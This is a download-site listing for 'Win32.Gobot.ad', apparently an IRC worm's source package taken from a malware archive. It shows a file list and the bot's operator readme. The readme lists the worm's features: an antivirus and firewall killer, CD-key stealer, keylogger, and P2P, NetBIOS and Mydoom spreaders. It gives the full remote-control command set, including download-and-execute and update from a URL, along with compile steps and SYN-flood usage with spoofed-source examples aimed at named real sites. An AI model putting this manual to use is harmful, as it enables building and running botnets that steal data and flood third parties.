Win32.Gobot.ad
所属分类:Windows编程
开发工具:Visual C++
文件大小:923KB
下载次数:0
上传日期:2021-02-03 15:21:02
上 传 者:
vxug
说明: Win32.Gobot.ad - malware source code from vx-underground repository
文件列表:
Worm.Win32.Gbot.056.a\ACLUnits\ACLUTILS.PAS (59549, 2003-12-28)
Worm.Win32.Gbot.056.a\ACLUnits\REGISTRY.PAS (6813, 2004-02-29)
Worm.Win32.Gbot.056.a\ACLUnits (0, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\icon.ico (2238, 2003-05-01)
Worm.Win32.Gbot.056.a\Resources\Src\EncodeStrings.cfg (386, 2004-04-02)
Worm.Win32.Gbot.056.a\Resources\Src\EncodeStrings.dof (1097, 2004-04-02)
Worm.Win32.Gbot.056.a\Resources\Src\EncodeStrings.dpr (2142, 2004-04-02)
Worm.Win32.Gbot.056.a\Resources\Src\EncodeStrings.~dpr (2109, 2004-04-02)
Worm.Win32.Gbot.056.a\Resources\Src (0, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TAUTHHOST.ini (381, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TAuthHost.str (76, 2004-04-01)
Worm.Win32.Gbot.056.a\Resources\TAVNAME.ini (11421, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TAVName.str (3319, 2003-06-17)
Worm.Win32.Gbot.056.a\Resources\TBOT.ini (252, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TBOT.str (101, 2004-05-16)
Worm.Win32.Gbot.056.a\Resources\TCDKEYS.ini (9755, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TCDKeys.str (2067, 2004-03-05)
Worm.Win32.Gbot.056.a\Resources\TERRORMESSAGES.ini (3167, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TErrorMessages.str (599, 2003-06-14)
Worm.Win32.Gbot.056.a\Resources\TIRCSERVERS.ini (259, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TIRCServers.str (58, 2004-03-19)
Worm.Win32.Gbot.056.a\Resources\TMAIN.ini (22223, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TMain.str (5207, 2004-05-02)
Worm.Win32.Gbot.056.a\Resources\TNBLogin.ini (244, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TNBLogin.STR (64, 2003-08-08)
Worm.Win32.Gbot.056.a\Resources\TNBPASSWORD.ini (3752, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TNBPassword.str (1158, 2003-08-08)
Worm.Win32.Gbot.056.a\Resources\TP2PFILENAMES.ini (1507, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TP2PFileNames.str (303, 2004-03-14)
Worm.Win32.Gbot.056.a\Resources\TSUFFIX.ini (292, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TSuffix.str (69, 2004-02-20)
Worm.Win32.Gbot.056.a\Resources\TVERSIONS.ini (10299, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TVersions.str (1942, 2004-04-02)
Worm.Win32.Gbot.056.a\Resources (0, 2004-07-31)
Worm.Win32.Gbot.056.a\System\Delphi5\getmem.inc (41694, 2000-06-15)
Worm.Win32.Gbot.056.a\System\Delphi5\makefile (9234, 2001-09-09)
Worm.Win32.Gbot.056.a\System\Delphi5\sysinit.dcu (2973, 2001-09-09)
Worm.Win32.Gbot.056.a\System\Delphi5\sysinit.pas (8556, 2000-06-15)
Worm.Win32.Gbot.056.a\System\Delphi5\SysSfIni.dcu (567, 2001-09-09)
... ...
;-----------------------------------------------------------------------------------;
; ;
; :;;,: .,: ..... :,;;: ......... ;
; ifji;;jDt .t#: i: .;#DitGD. .fji,:;fEt tLiif#fiiLi;
; .Dj :. tE . . . ;W ,#; ,#, iW, ,#f : t# . ;
; DK Dt,iG# .ji;tWt ii;iE ;EDi, jK;;tf, ,#L #G DG ;
;:#G :;iii .#t. Gf Kj KL.Kft;: W, ,iiii Ej..,EE f#i ;#i .#i ;
; EW. fW fL .W: ;#: :W:..:,fW ;E ..... ;#: LW. ;#f :Ei tW. ;
; .fEj,:,;Df :#. jE;.:KL;;j. fG;;i, LE;: ,E#tiijj. ;DLi::;tf: ;KE; ;
; .::: .. .. ::: ;
; ;
;-----------------------------------------------------------------------------------;
; Features: ;
; - SpyBot compatible commands, ;
; - AV/FW killer, ;
; - CD-Key Stealer, ;
; - Mydoom spreader, ;
; - NetBIOS spreader, ;
; - Encrypted strings in EXE, ;
; - Web-server (http://xxx.xxx.xxx.xxx:Port), ;
; - API search engine by CRC32 (used only for important APIs), ;
; - KeyLogger (Keylog file can be download from webserver too), ;
; - P2P spreader (Kazaa, Edonkey, Morpheus, XoloX, ShareAza, LimeWire, ;
; - Prepend all .exe files in shared dirs if they are smaller than 5MB, ;
; - Support DCC SEND, DCC GET, DCC CHAT and topic commands. ;
; ;
; --------------------------------------------------------------------------------- ;
; Compile: ;
; - Run make.bat to compile the source! (Tested with Delphi 6) ;
; --------------------------------------------------------------------------------- ;
; - \System ;
; System.dcu, sysinit.dcu and so on units replacement for Delphi 6 ;
; Allows to make program size smaller onto about 9,5K. ;
; - \ACLUnits ;
; SysUtils and Registry units replacement. ;
; - \Resources ;
; Necessary Icon and INI files. ;
;-----------------------------------------------------------------------------------;
COMMANDS LIST: (Note: Only the "login" command is case sensitive)
--------------
login password (example: login hello)
logout
delete [filename] (example: delete c:\windows\temp.exe)
execute [filename] (example: delete c:\windows\temp.exe)
rename [origenamfile] [newfile] (example: rename c:\windows\temp.exe c:\windows\driver.exe)
makedir [dirname] (example: makedir c:\test\)
info (info: gives some info)
killprocess [processname] (example: killprocess mcafee.exe)
disconnect [sec.] (info: disconnect the bot for x sec. if sec. is not given it disconnect the bot for 30mins.)
quit (info: bot quits running)
download [url] [filename] (example: download http://127.0.0.1/server.exe c:\driver.exe) (info: Dot forget "http://" string in URL!)
httpserver [Port] [root-dir] (example: httpserver 81 c:\)
listprocesses (info: lists all running proccesses)
op
get [filename] (example: get c:\command.com will trigger a dcc send on the remote pc)
raw [raw command] (example: raw PRIVMSG #ghostbot :hello)
threads (info: will list al threads)
list [path+filter] (example: list c:\*.*)
cdkeys (info: search CD-Keys on server's computer)
restart (info: restarts the server's computer)
shutdown (info: shuts down the server's computer)
ipscan [StartIP] [port] (example: ipscan 1.1.1.1 3137)
stopipscan (info: stop IP scanner)
uninstall (info: remove BOT)
startmydoom (info: restart MyDoom spreader)
stopmydoom (info: stop MyDoom spreader)
startavfwkiller {info: restart AV/FW killer}
stopavfwkiller {info: stop AV/FW killer}
starnetbios {info: (re)start netbios spreader}
stopnetbios {info: stop netbios spreader}
mirccmd {example: mirccmd /msg #GhostBOT Hi!} {info: send message to victim's mIRC (if mIRC is open)
redirect [input port] [host] [output port] (example: redirect 100 eu.undernet.org 6667)
clone [srv.] [port] [chan] [number of clones] (example: clone 1.1.1.1 6667 #abc 4)
rawclones [command] (example: rawclones PRIVMSG #ABCD :hello ; info: some servers do not allow more than 1 clone)
killclones (info: remove all clones)
stopsyn (info: stop syn flooder)
update [URL] (example: update http://www.nasa.gov\1.exe) (info: Dot forget "http://" string in URL!)
Syn Flooder command
-------------------
syn [victim] [options]
Options:
-S: Spoof host (0 is random (default))
-p: Separated list of dest ports (0 is random (default))
-s: Separated list of src ports (0 is random (default))
-n: Number of packets (0 is continuous (default))
-d: Delay (in ms) (default 0)
Example I: syn www.kazaa.com -p 21,23,80,110
On this attack:
- Victim: www.kazaa.com
- Source IP: Random
- Destination ports: 21 + 23 + 80 + 110
- Source ports: Random
- Count: Continuous
- Delay: 0 ms (no delay between packets)
Example II: syn www.kazaa.org -S www.edonkey.com -p 21,80 -s 42,63 -n 1 -d 50
On this attack:
- Victim: www.kazaa.com
- Source IP/host: www.edonkey.com
- Destination ports: 21 + 80
- Source ports: 42 + 63
- Count: 1
* Please note that 1 count will send the syn packets from every *
* source port to every destination port. This means 4 packets *
* will be transmited with a 1 count on this attack. *
- Delay: 50 ms
;-----------------------------------------------------------------------------------;
BOT SETTINGS:
-------------
- Settings.ini include the main settings for compiler.
- .\Resources\ (All srings inside .\resources\*.str files will be encrypted after compile):
TBOT.str - Main parameters of the BOT. You can freely change them.
TP2PFILENAMES.str - File names of P2P spreader.
TCDKEYS.str - parameters of CD-Key stealer -> (1 KEY = 3 parameter)
1=SWAT3, <- Software name
2=WON\CDKeys, <- Registry key
3=SWAT3, <- Registry value
....
TIRCSSERVERS.str - Here you can give unlimited number of IRC servers.
TAUTHHOST.str - List of allowed host(s) at !login command.
近期下载者:
相关文件:
收藏者: